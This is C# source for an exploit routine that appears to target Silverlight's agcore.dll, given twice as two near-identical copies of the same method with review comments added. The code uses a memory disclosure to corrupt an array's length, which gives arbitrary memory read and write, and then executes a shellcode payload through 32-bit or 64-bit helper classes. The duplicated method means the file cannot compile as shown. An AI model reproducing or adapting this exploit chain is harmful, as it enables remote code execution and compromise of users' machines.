        // Runs the sample end to end: a value from MemoryDiscl() is handed to
        // MyObject.Init, buf.Length is compared before and after, and a ShellHelper
        // chosen by is64 runs `payload`. Every name used here (LogAdd, Hex,
        // MemoryDiscl, buf, MyObject, ShellHelper32/ShellHelper64, payload, is64)
        // is declared outside this method. Returns nothing; every failure is
        // swallowed by the catch at the bottom and only written to the log, so a
        // caller cannot tell from this method whether the sequence completed.
        void exploit()
        {
            try
            {
                LogAdd("------------ START ------------");
                // prepare pointer for ScriptObject.Initialize()
                ulong h = MemoryDiscl();
                LogAdd("handle = " + Hex(h));
                // zero is the only MemoryDiscl() result rejected here; any other
                // value is passed on without further validation
                if (h == 0)
                {
                    throw new Exception("Something is wrong with the memory disclosure");
                }

                // save old length
                int oldLen = buf.Length;
                LogAdd("buf.Length = " + Hex(oldLen));

                // call ScriptObject.Initialize() and cause the buf.Length corruption
                MyObject mo = new MyObject();
                // NOTE(review): on 32-bit .NET Framework the ulong -> IntPtr cast
                // presumably throws OverflowException for values outside the int
                // range; that would land in the catch below like any other failure
                mo.Init((IntPtr)h); // call agcore.dll DOM_ReferenceObject(h)

                // check results: the only success criterion is that buf.Length changed
                int len = buf.Length;
                LogAdd("buf.Length = " + Hex(len));
                if (len == oldLen)
                {
                    throw new Exception("Something is wrong with buf.Length");
                }

                // ok, now we have an uint[] array with Length > 0x40000000, so we can read/write arbitrary memory addresses on x32,
                // but this is not always enough for x64. So for 64-bit we have to use a different technique to gain the true "god mode".
                // sh is typed as ShellHelper32 on both paths, so ShellHelper64
                // presumably derives from ShellHelper32 (the assignment would not
                // compile otherwise) — confirm against the helper definitions
                ShellHelper32 sh;
                if (is64)
                {
                    sh = new ShellHelper64();
                    sh.SetPayload(payload);
                }
                else
                {
                    sh = new ShellHelper32();
                    sh.SetPayload(payload);
                }

                // execute payload; oldLen is the pre-corruption length saved above
                sh.Exec(oldLen);

                LogAdd("------------  END  ------------");
            }
            // catch-all: the two Exceptions thrown above and anything thrown by the
            // helpers end here; nothing is rethrown, so the log is the only record
            // of the outcome (a more specific exception type would let the two
            // deliberate aborts be told apart from unexpected failures)
            catch (Exception ex)
            {
                LogAdd("Error: " + ex.ToString());
            }
        }
        // Second copy of exploit(), identical to the one above apart from the
        // brace-less throw statements. Two methods with the same signature cannot
        // coexist in one C# type, so these are presumably two pasted variants of
        // the same sample rather than one compilable file.
        //
        // Sequence: MemoryDiscl() -> MyObject.Init -> compare buf.Length ->
        // ShellHelper (32 or 64 by is64) runs `payload`. LogAdd, Hex, MemoryDiscl,
        // buf, MyObject, ShellHelper32/ShellHelper64, payload and is64 are all
        // declared outside this method. Nothing is returned; failures are caught
        // at the bottom and only logged.
        void exploit()
        {
            try
            {
                LogAdd("------------ START ------------");
                // prepare pointer for ScriptObject.Initialize()
                ulong h = MemoryDiscl();
                LogAdd("handle = " + Hex(h));
                // only a zero result is rejected; no other validation of h happens here
                if (h == 0) throw new Exception("Something is wrong with the memory disclosure");

                // save old length
                int oldLen = buf.Length;
                LogAdd("buf.Length = " + Hex(oldLen));

                // call ScriptObject.Initialize() and cause the buf.Length corruption
                MyObject mo = new MyObject();
                // NOTE(review): in a 32-bit .NET Framework process the ulong -> IntPtr
                // cast presumably throws OverflowException for values above the int
                // range; that is caught below like every other failure
                mo.Init((IntPtr)h); // call agcore.dll DOM_ReferenceObject(h)

                // check results: success is judged solely by buf.Length having changed
                int len = buf.Length;
                LogAdd("buf.Length = " + Hex(len));
                if (len == oldLen) throw new Exception("Something is wrong with buf.Length");

                // ok, now we have an uint[] array with Length > 0x40000000, so we can read/write arbitrary memory addresses on x32,
                // but this is not always enough for x64. So for 64-bit we have to use a different technique to gain the true "god mode".
                // ShellHelper64 is assigned to a ShellHelper32 variable, so it
                // presumably derives from ShellHelper32 — confirm in the helper sources
                ShellHelper32 sh;
                if (is64)
                {
                    sh = new ShellHelper64();
                    sh.SetPayload(payload);
                }
                else
                {
                    sh = new ShellHelper32();
                    sh.SetPayload(payload);
                }

                // execute payload; the length saved before Init is passed in, not the new one
                sh.Exec(oldLen);

                LogAdd("------------  END  ------------");
            }
            // catch-all: both deliberate aborts above and any failure from the helpers
            // are logged and dropped; nothing is rethrown, so the caller sees no error
            catch (Exception ex)
            {
                LogAdd("Error: " + ex.ToString());
            }
        }